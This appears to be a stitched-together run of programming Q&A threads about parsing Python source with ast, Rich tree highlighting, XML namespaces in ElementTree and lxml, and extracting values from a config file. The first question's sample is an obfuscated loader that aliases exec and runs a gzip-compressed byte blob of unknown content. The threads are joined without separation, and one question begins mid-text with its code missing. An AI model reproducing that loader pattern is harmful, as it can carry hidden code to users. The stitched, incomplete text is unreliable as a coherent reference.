I'm trying to parse Python snippets, some of which contain byte strings.
For example:
"""
from gzip import decompress as __;_=exec;_(__(b'\x1f\x8b\x08\x00\xcbYmc\x02\xff\xbd7i\xb3\xdaJv\xdf\xdf\xaf /I\xf9\xbar\xc6%\x81#\x92k\x9c)\x16I,b\x95Xm\x87\x92Z-$\xd0\x86\x16\x10LM~{N\x03\xd7\xc6\xd7\x9e%\xa9\xa9PE/\xa7\xcf\xbeuk\xd3\xacm\xdd"\x94\x1b\'\xa5\xda\x04"H\x17\xae\xe3t\xf4\xcdn\x03\xa9/&T>\x13\xdbu\g=\x9f\x13~\x11\xf6\x9b\xd7\x15~\xb2\xe7\xbc\xe6\xc2K\xb8\x18\x03\xfd|[\x7f\xe8\xb8I;\xf0\xf1\x93\xec\x83\x8eo15\x8dC\xfc\xc6I\xf1\xfd\xf5r\x8f\xeb\x0f\xd7\xc53#\xa8<_\xb2Py\xbe\xe1\xde\xff\x0fk&\x93\xa8V\x18\x00\x00'))
x = b"\x1f\x8b\x08"
y = "hello world"
"""
Is there a regex pattern I can use to correctly find those strings?
I have tried implementing a regex query myself, like so:
bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b\'(.+?)'", text)
I was expecting to receive an array
[b'\x1f\x8b\x08\x00\xcbYmc\x02\xff\xbd7i\xb3\xdaJv\xdf\xdf\xaf /I\xf9\xbar\xc6%\x81#\x92k\x9c)\x16I,b\x95Xm\x87\x92Z-$\xd0\x86\x16\x10LM~{N\x03\xd7\xc6\xd7\x9e%\xa9\xa9PE/\xa7\xcf\xbeuk\xd3\xacm\xdd"\x94\x1b\'\xa5\xda\x04"H\x17\xae\xe3t\xf4\xcdn\x03\xa9/&T>\x13\xdbu\g=\x9f\x13~\x11\xf6\x9b\xd7\x15~\xb2\xe7\xbc\xe6\xc2K\xb8\x18\x03\xfd|[\x7f\xe8\xb8I;\xf0\xf1\x93\xec\x83\x8eo15\x8dC\xfc\xc6I\xf1\xfd\xf5r\x8f\xeb\x0f\xd7\xc53#\xa8<_\xb2Py\xbe\xe1\xde\xff\x0fk&\x93\xa8V\x18\x00\x00', b"\x1f\x8b\x08"]
Instead, it returns an empty array.
This isn't a job for regular expressions, but for a Python parser.
import ast
code = """
...
"""
tree = ast.parse(code)
Now you can walk the tree looking for nodes of type ast.Constant whose value attribute has type bytes. Do this by defining a subclass of ast.NodeVisitor and overriding its visit_Constant method. This method will be called on each node of type ast.Constant in the tree, letting you examine the value. Here, we simply append matching values to a global list.
bytes_literals = []
class BytesLiteralCollector(ast.NodeVisitor):
    def visit_Constant(self, node):
        if isinstance(node.value, bytes):
            bytes_literals.append(node.value)
BytesLiteralCollector().visit(tree)
The documentation for NodeVisitor is not great. Aside from the two documented methods visit and generic_visit, I believe you can define visit_* where * can be any of the node types defined in the abstract grammar presented at the start of the documentation.
You can use print(ast.dump(ast.parse(code), indent=4)) to get a more-or-less readable representation of the tree that your visitor will walk.
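As a rough, self-contained sketch of the visitor approach described above: the SAMPLE source below is a made-up stand-in for the real snippets, and storing the results on the visitor instance (instead of a global list) is just one possible design. It assumes Python 3.8 or later, where literals are represented as ast.Constant nodes.

```python
import ast

# Hypothetical sample source; any Python code held in a string would do.
SAMPLE = r'''
x = b"\x1f\x8b\x08"
y = "hello world"
z = [b'abc', 1, "b'not bytes'"]
'''

class BytesLiteralCollector(ast.NodeVisitor):
    def __init__(self):
        # Keep results on the instance so the visitor can be reused.
        self.found = []

    def visit_Constant(self, node):
        # Called for every literal; keep only the bytes ones.
        if isinstance(node.value, bytes):
            self.found.append(node.value)

collector = BytesLiteralCollector()
collector.visit(ast.parse(SAMPLE))
print(collector.found)
```

Note that the ordinary string "b'not bytes'" is not collected, which is the kind of false positive a regex would be prone to.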
I'm building some trees with Rich. However, I'm outputting obj repr() and also Python object details that Rich only seems to want to display if I pass the data to the tree branch as a string, i.e.
tree = Tree(str(type(root_obj)))
My question is: how can I colourize the output of my tree in Rich? For example, if I pass a type to the tree without casting it to a string, I get:
tree = Tree(type(root_obj))
...
rich.errors.NotRenderableError: Unable to render <class 'nornir.core.task.AggregatedResult'>; A str, Segment or object with __rich_console__ method is required
But I am not sure which console method to use here. Any help would be great. Thanks.
You can highlight text via a Rich highlighter. The ReprHighlighter will highlight the strings produced from most objects. Import it like this:
from rich.highlighter import ReprHighlighter
highlighter = ReprHighlighter()
Now you can highlight strings in the following way:
tree = Tree(highlighter(str(root_obj)))
Alternatively, you can use Rich's pretty printing capabilities via the rich.pretty.Pretty class:
from rich.pretty import Pretty
tree = Tree(Pretty(root_obj))
I'm a total noob at coding. I study IT and have a school project in which I must convert a .txt file into an XML file. I have managed to create a tree and subelements, but I must put an XML namespace in the code, because the resulting XML file must be opened in a program that shows a table of the information, and something more. Without the schema from the XML namespace, it won't open anything. Can someone help me with how to put an .xsd in my code?
This is the schema:
http://www.pufbih.ba/images/stories/epp_docs/PaketniUvozObrazaca_V1_0.xsd
Example of the XML file I must create:
http://www.pufbih.ba/images/stories/epp_docs/4200575050089_1022.xml
And in the first row I have the schema that I must input: "urn:PaketniUvozObrazaca_V1_0.xsd"
This is the code I have created so far:
import xml.etree.ElementTree as xml
def GenerateXML(GIP1022):
    root=xml.Element("PaketniUvozObrazaca")
    p1=xml.Element("PodaciOPoslodavcu")
    root.append(p1)
    jib=xml.SubElement(p1,"JIBPoslodavca")
    jib.text="4254160150005"
    pos=xml.SubElement(p1,"NazivPoslodavca")
    pos.text="MOJATVRTKA d.o.o. ORAŠJE"
    zah=xml.SubElement(p1,"BrojZahtjeva")
    zah.text="8"
    datz=xml.SubElement(p1,"DatumPodnosenja")
    datz.text="2021-01-01"
    tree=xml.ElementTree(root)
    with open(GIP1022,"wb") as files:
        tree.write(files)

if __name__=="__main__":
    GenerateXML("primjer.xml")
The official documentation is not super explicit as to how one works with namespaces in ElementTree, but the core of it is that ElementTree takes a very fundamental(ist) approach: instead of manipulating namespace prefixes / aliases, elementtree uses Clark's Notation.
So e.g.
<bar xmlns="foo">
or
<x:bar xmlns:x="foo">
(the element bar in the foo namespace) would be written
{foo}bar
>>> from xml.etree.ElementTree import Element, SubElement, QName, tostring, register_namespace
>>> tostring(Element('{foo}bar'), encoding='unicode')
'<ns0:bar xmlns:ns0="foo" />'
Alternatively (and sometimes more conveniently for authoring and manipulating), you can use QName objects, which can either take a tag name in Clark's notation, or separately take a namespace and a tag name:
>>> tostring(Element(QName('foo', 'bar')), encoding='unicode')
'<ns0:bar xmlns:ns0="foo" />'
So while ElementTree doesn't have a namespace object per se, you can create namespaced elements like this, probably via a helper partially applying QName:
>>> from functools import partial
>>> ns = partial(QName, 'urn:PaketniUvozObrazaca_V1_0.xsd')
>>> root = Element(ns("PaketniUvozObrazaca"))
>>> SubElement(root, ns("PodaciOPoslodavcu"))
<Element <QName '{urn:PaketniUvozObrazaca_V1_0.xsd}PodaciOPoslodavcu'> at 0x7f502481bdb0>
>>> tostring(root, encoding='unicode')
'<ns0:PaketniUvozObrazaca xmlns:ns0="urn:PaketniUvozObrazaca_V1_0.xsd"><ns0:PodaciOPoslodavcu /></ns0:PaketniUvozObrazaca>'
Now there are a few important considerations here:
First, as you can see the prefix when serialising is arbitrary, this is in keeping with ElementTree's fundamentalist approach to XML (the prefix should not matter), but it has since grown a "register_namespace" global function which allows registering specific prefixes:
>>> register_namespace('xxx', 'urn:PaketniUvozObrazaca_V1_0.xsd')
>>> tostring(root, encoding='unicode')
'<xxx:PaketniUvozObrazaca xmlns:xxx="urn:PaketniUvozObrazaca_V1_0.xsd"><xxx:PodaciOPoslodavcu /></xxx:PaketniUvozObrazaca>'
You can also pass a single default_namespace to (some) serialization functions to specify the default namespace:
>>> tostring(root, encoding='unicode', default_namespace='urn:PaketniUvozObrazaca_V1_0.xsd')
'<PaketniUvozObrazaca xmlns="urn:PaketniUvozObrazaca_V1_0.xsd"><PodaciOPoslodavcu /></PaketniUvozObrazaca>'
A second, possibly larger, issue is that ElementTree does not support validation.
The Python standard library does not provide support for any validating parser or tree builder, whether DTD, rng, xml schema, anything. Not by default, and not optionally.
lxml is probably the main alternative supporting validation (of multiple types of schema), its core API follows ElementTree but extends it in multiple ways and directions (including much more precise namespace prefix support, and prefix round-tripping). But even then the validation is (AFAIK) mostly explicit, at least when generating / serializing documents.
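Putting the namespace pieces of this answer together, here is a minimal sketch of how the document from the question might be built with the standard library. The ns helper and the variable names are illustrative choices, not anything ElementTree prescribes, and passing default_namespace to tostring assumes Python 3.8 or later. Nothing here validates against the .xsd; it only produces namespaced output.

```python
import xml.etree.ElementTree as ET
from functools import partial

NS = "urn:PaketniUvozObrazaca_V1_0.xsd"
# Illustrative helper: ns("tag") builds QName(NS, "tag"), i.e. {NS}tag.
ns = partial(ET.QName, NS)

root = ET.Element(ns("PaketniUvozObrazaca"))
employer = ET.SubElement(root, ns("PodaciOPoslodavcu"))
ET.SubElement(employer, ns("JIBPoslodavca")).text = "4254160150005"
ET.SubElement(employer, ns("BrojZahtjeva")).text = "8"

# Every element is qualified, so the namespace can be emitted as the default one.
xml_text = ET.tostring(root, encoding="unicode", default_namespace=NS)
print(xml_text)

# Round trip: after parsing, the tag carries the namespace in Clark's notation.
reparsed = ET.fromstring(xml_text)
print(reparsed.tag)
```

Qualifying every element keeps the in-memory tree and the serialized document in agreement about which namespace each element belongs to.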
What you want is to add a default namespace declaration (xmlns="urn:PaketniUvozObrazaca_V1_0.xsd") to the root element. I have edited the code in the question to show you how this can be done.
import xml.etree.ElementTree as ET
def GenerateXML(GIP1022):
    # Create the PaketniUvozObrazaca root element in the urn:PaketniUvozObrazaca_V1_0.xsd namespace
    root = ET.Element("{urn:PaketniUvozObrazaca_V1_0.xsd}PaketniUvozObrazaca")

    # Add subelements
    p1 = ET.Element("PodaciOPoslodavcu")
    root.append(p1)
    jib = ET.SubElement(p1,"JIBPoslodavca")
    jib.text = "4254160150005"
    pos = ET.SubElement(p1,"NazivPoslodavca")
    pos.text = "MOJATVRTKA d.o.o. ORAŠJE"
    zah = ET.SubElement(p1,"BrojZahtjeva")
    zah.text = "8"
    datz = ET.SubElement(p1,"DatumPodnosenja")
    datz.text = "2021-01-01"

    # Make urn:PaketniUvozObrazaca_V1_0.xsd the default namespace (no prefix)
    ET.register_namespace("", "urn:PaketniUvozObrazaca_V1_0.xsd")

    # Prettify output (requires Python 3.9)
    ET.indent(root)

    tree = ET.ElementTree(root)
    with open(GIP1022,"wb") as files:
        tree.write(files)

if __name__=="__main__":
    GenerateXML("primjer.xml")
Contents of primjer.xml:
<PaketniUvozObrazaca xmlns="urn:PaketniUvozObrazaca_V1_0.xsd">
  <PodaciOPoslodavcu>
    <JIBPoslodavca>4254160150005</JIBPoslodavca>
    <NazivPoslodavca>MOJATVRTKA d.o.o. ORAŠJE</NazivPoslodavca>
    <BrojZahtjeva>8</BrojZahtjeva>
    <DatumPodnosenja>2021-01-01</DatumPodnosenja>
  </PodaciOPoslodavcu>
</PaketniUvozObrazaca>
Note that only the root element is explicitly bound to a namespace in the code. The subelements do not need to be in a namespace when they are added. The end result is an XML document (primjer.xml) where all elements belong to the same default namespace.
The above is not the only way to create an element in a namespace. For example, instead of the {namespace-uri}name notation, the QName class can be used. See https://stackoverflow.com/a/58678592/407651.
The tree.write() method takes a default_namespace argument.
What happens if you change that line to the following?
tree.write(files, default_namespace="urn:PaketniUvozObrazaca_V1_0.xsd")
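One way to explore that suggestion is the sketch below, which writes to an in-memory buffer instead of a file. The write_with_default_ns helper is a hypothetical name introduced only for this illustration. In CPython's ElementTree, default_namespace refuses unqualified tag names, so the tags have to be namespace-qualified first.

```python
import io
import xml.etree.ElementTree as ET

NS = "urn:PaketniUvozObrazaca_V1_0.xsd"

def write_with_default_ns(root):
    """Serialize root the way tree.write(files, default_namespace=NS) would."""
    buffer = io.BytesIO()
    ET.ElementTree(root).write(buffer, default_namespace=NS)
    return buffer.getvalue().decode("ascii")

# Unqualified tags, as in the question's code.
plain = ET.Element("PaketniUvozObrazaca")
ET.SubElement(plain, "PodaciOPoslodavcu")
try:
    plain_result = write_with_default_ns(plain)
except ValueError as error:
    plain_result = "ValueError: %s" % error
print(plain_result)

# Same structure, with every tag qualified in Clark's notation.
qualified = ET.Element("{%s}PaketniUvozObrazaca" % NS)
ET.SubElement(qualified, "{%s}PodaciOPoslodavcu" % NS)
qualified_result = write_with_default_ns(qualified)
print(qualified_result)
```

So the default_namespace argument alone is probably not enough for the code in the question; it works once the elements themselves are created in the namespace.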
I am trying to create an XML export from a python application and need to structure the file in a specific way for the external recipient of the file.
The root node needs to be namespaced, but the child nodes should not.
The root node should look like this:
<ns0:SalesInvoice_Custom_Xml xmlns:ns0="http://EDI-export/Invoice">...</ns0:SalesInvoice_Custom_Xml>
I have tried to generate the same node using the lxml library on Python 2.7, but it does not behave as expected.
Here is the code that should generate the root node:
def create_edi(self, document):
    _logger.info("INFO: Started creating EDI invoice with invoice number %s", document.number)
    rootNs = etree.QName("ns0", "SalesInvoice_Custom_Xml")
    doc = etree.Element(rootNs, nsmap={
        'ns0': "http://EDI-export/Invoice"
    })
This gives the following output:
<ns1:SalesInvoice_Custom_Xml xmlns:ns0="http://EDI-export/Invoice" xmlns:ns1="ns0">...</ns1:SalesInvoice_Custom_Xml>
What should I change in my code to get lxml to generate the correct root node?
You need to use
rootNs = etree.QName(ns0, "SalesInvoice_Custom_Xml")
with
ns0 = "http://EDI-export/Invoice"
The whole data structure itself is agnostic of any namespace mapping you might apply later, i.e. the tags know the true namespaces (e.g. http://EDI-export/Invoice), not their mapping (e.g. ns0).
Later, when you finally serialize this into a string, a namespace mapping is needed. Then (and only then) will a namespace mapping be used.
Also, after parsing you can ask the etree object which namespace mapping was found during parsing. But that is not part of the structure; it is just additional information about how the structure was encoded as a string. Consider that the following two XML documents are logically equal:
<x:tag xmlns:x="namespace"></x:tag>
and
<y:tag xmlns:y="namespace"></y:tag>
After parsing, their structures will be equal, their namespace mappings will not.
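The point about prefixes can be checked with a small sketch. Note that it uses the standard library's xml.etree.ElementTree rather than lxml (an assumption made so the example has no third-party dependency); both expose the parsed tag in the same {namespace}name form.

```python
import xml.etree.ElementTree as ET

# Two documents that differ only in the prefix bound to the namespace.
first = ET.fromstring('<x:tag xmlns:x="namespace"></x:tag>')
second = ET.fromstring('<y:tag xmlns:y="namespace"></y:tag>')

# The parsed tag stores the namespace itself, not the prefix.
print(first.tag)
print(first.tag == second.tag)
```

The prefixes x and y do not survive in the tag names, which is why QName expects the namespace URI rather than a prefix such as ns0.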
When I print this I get:
FuncA
FuncB
FuncC
When really what I want is:
['FuncA', 'FuncB', 'FuncC']
How would I be able to iterate through my returned values and add them to the list?
Rather than manually look for text (which can easily lead to false positives), use the ast module to build an abstract syntax tree, then extract function names with that:
import ast
functions = []
with open( 'codefile.py', 'r') as file:
    tree = ast.parse(file.read(), 'codefile.py')

for node in ast.walk(tree):
    if isinstance(node, ast.FunctionDef):
        functions.append(node.name)

print(functions)
This finds all function definitions anywhere in the source code, just like your search for def text would have, except that it skips commented-out code or the word def in a string literal, for instance.
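To see the difference from a plain text search, here is a small sketch run on an in-memory source string instead of codefile.py. The SOURCE contents are invented for the demonstration, and including ast.AsyncFunctionDef is an optional extension, since ast.FunctionDef alone does not match async def.

```python
import ast

# Invented sample containing a commented-out def and a def inside a string.
SOURCE = '''
def FuncA():
    pass

# def CommentedOut(): pass

class Holder:
    def FuncB(self):
        return "def NotAFunction(): pass"

async def FuncC():
    pass
'''

names = [
    node.name
    for node in ast.walk(ast.parse(SOURCE))
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))
]
# ast.walk makes no ordering promise, so sort before printing.
print(sorted(names))
```

Neither CommentedOut nor NotAFunction is reported, because neither exists as a definition in the syntax tree.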
I have a file in gran/config.py and I cannot import this file (not an option).
Inside this config.py, there is the following code
...<more code>
animal = dict(
    bear = r'^bear4x',
    tiger = r'^.*\tiger\b.*$'
)
...<more code>
I want to be able to parse r'^bear4x' or r'^.*\tiger\b.*$' based on bear or tiger.
I started out with
try:
    text = open('gran/config.py','r')
    tline = filter('not sure', text.readlines())
    text.close()
except IOError, str:
    pass
I was hoping to grab the whole animal dict by
grab = re.compile("^animal\s*=\s*('.*')")
or something like that, and maybe change tline to
tline = filter(grab.search, text.readlines())
but it only grabs animal = dict( and not the following lines of the dict.
How can I grab multiple lines? Look for animal, then confirm the first '(', then continue looking until ')'?
Note: the size of the animal dict may change, so any static approach (like grabbing 4 extra lines after animal is found) wouldn't work.
Maybe you should try some AST hacks? With Python it is easy:
import ast
config = ast.parse(open('config.py').read())
So now you have your parsed module. You need to extract the assignment to animals and evaluate it. There is a safe ast.literal_eval function, but since we make a call to dict it won't work here. The idea is to traverse the whole module tree, keeping only the assignments, and run them locally:
class OnlyAssings(ast.NodeTransformer):
    def generic_visit(self, node):
        return None  # throw other things away

    def visit_Module(self, node):
        # We need to visit Module and pass it on
        return ast.NodeTransformer.generic_visit(self, node)

    def visit_Assign(self, node):
        target = node.targets[0]
        # Keep only plain-name assignments to animals (this you may want to change)
        if isinstance(target, ast.Name) and target.id == 'animals':
            return node  # pass it
        return None  # throw away

config = OnlyAssings().visit(config)
Compile it and run:
exec(compile(config, 'config.py', 'exec'))
print(animals)
If animals should end up in some dictionary, pass it as the locals to exec:
data = {}
exec(compile(config, 'config.py', 'exec'), globals(), data)
print(data['animals'])
There is much more you can do with AST hacking, such as visiting all If and For statements. Check the documentation for details.
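As a variation on the idea above that avoids exec altogether, the following sketch reads the keyword arguments of the dict(...) call straight from the tree and evaluates each value with ast.literal_eval. CONFIG_SOURCE is a made-up stand-in for gran/config.py, extract_dict_call is a hypothetical helper name, and the approach assumes the dict is written as a dict(key=literal, ...) call like in the question.

```python
import ast

# Hypothetical stand-in for the contents of gran/config.py.
CONFIG_SOURCE = r"""
import doesnotexist  # only parsed, never executed

animal = dict(
    bear = r'^bear4x',
    tiger = r'^.*\tiger\b.*$'
)
"""

def extract_dict_call(source, name):
    """Return the keyword arguments of `name = dict(...)` as a real dict."""
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Assign):
            continue
        targets = [t.id for t in node.targets if isinstance(t, ast.Name)]
        call = node.value
        if (name in targets and isinstance(call, ast.Call)
                and isinstance(call.func, ast.Name) and call.func.id == "dict"):
            # literal_eval accepts only literals, so no code from the file runs.
            return {kw.arg: ast.literal_eval(kw.value)
                    for kw in call.keywords if kw.arg is not None}
    raise KeyError(name)

animal = extract_dict_call(CONFIG_SOURCE, "animal")
print(animal["bear"])
```

Because the file is only parsed, the failing import in it is harmless, and the size of the dict does not matter.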
If the only reason you can't import that file as-is is because of imports that will fail otherwise, you can potentially hack your way around it rather than trying to process a perfectly good Python file as just text.
For example, if I have a file named busted_import.py with:
import doesnotexist
foo = 'imported!'
And I try to import it, I will get an ImportError. But if I define what the doesnotexist module refers to using sys.modules before trying to import it, the import will succeed:
>>> import sys
>>> sys.modules['doesnotexist'] = ""
>>> import busted_import
>>> busted_import.foo
'imported!'
So if you can just isolate the imports that will fail in your Python file and redefine those prior to attempting an import, you can work around the ImportErrors.
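The same trick can be tried end to end with the sketch below. It writes busted_import.py into a temporary directory so that it is self-contained, and it registers an empty types.ModuleType as the placeholder instead of an empty string; that substitution is an assumption of this sketch, chosen so the placeholder behaves like a module if attributes are later set on it.

```python
import importlib
import os
import sys
import tempfile
import types

# Write a throwaway module whose import would normally fail.
workdir = tempfile.mkdtemp()
with open(os.path.join(workdir, "busted_import.py"), "w") as handle:
    handle.write("import doesnotexist\nfoo = 'imported!'\n")

sys.path.insert(0, workdir)
# Register an empty placeholder module under the missing name.
sys.modules["doesnotexist"] = types.ModuleType("doesnotexist")

busted_import = importlib.import_module("busted_import")
print(busted_import.foo)
```

If the real file uses attributes of the missing module at import time, the placeholder would need those attributes defined as well.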
I do not understand exactly what you are trying to do.
If you want to process each line with regular expression - you have ^ in regular expression re.compile("^animal\s*=\s*('.*')"). It matches only when animal is at the start of line, not after some spaces. Also of course it does not match bear or tiger - use something like re.compile("^\s*([a-z]+)\s*=\s*('.*')").
If you want to process multiple lines with single regular expression,
read about re.DOTALL and re.MULTILINE and how they affect matching newline characters:
http://docs.python.org/2/library/re.html#re.MULTILINE
Also note that text.readlines() reads lines, so the filter function in filter('not sure', text.readlines()) is run on each line, not on whole file. You cannot pass regular expression in this filter(<re here>, text.readlines()) and hope it will match multiple lines.
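For illustration only, this is roughly what matching across lines with those flags could look like when the whole file is read as one string. CONFIG_TEXT is an invented stand-in for the file contents, and both patterns are assumptions that fit this exact layout (a closing parenthesis at the start of a line, one key per line, single-quoted values); they are fragile against anything else.

```python
import re

# Invented stand-in for the text of gran/config.py.
CONFIG_TEXT = r"""
animal = dict(
    bear = r'^bear4x',
    tiger = r'^.*\tiger\b.*$'
)
"""

# MULTILINE lets ^ match at each line start; DOTALL lets . cross newlines.
block = re.search(r"^animal\s*=\s*dict\((.*?)^\)", CONFIG_TEXT,
                  re.MULTILINE | re.DOTALL)
body = block.group(1)

# One key = r'...' pair per line inside the dict(...) call.
pairs = dict(re.findall(r"^\s*([a-z]+)\s*=\s*r?'(.*)'", body, re.MULTILINE))
print(pairs["bear"])
```

A value containing a quote followed by more text on the same line, or a nested parenthesis at the start of a line, would already break this.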
BTW, processing Python files (and HTML, XML, JSON... files) using regular expressions is not wise. For every regular expression you write, there are cases where it will not work. Use a parser designed for the given format; for Python source code, that is ast. But for your use case, ast is too complex.
Maybe it would be better to use classic config files and configparser. More structured data like lists and dicts can easily be stored in JSON or YAML files.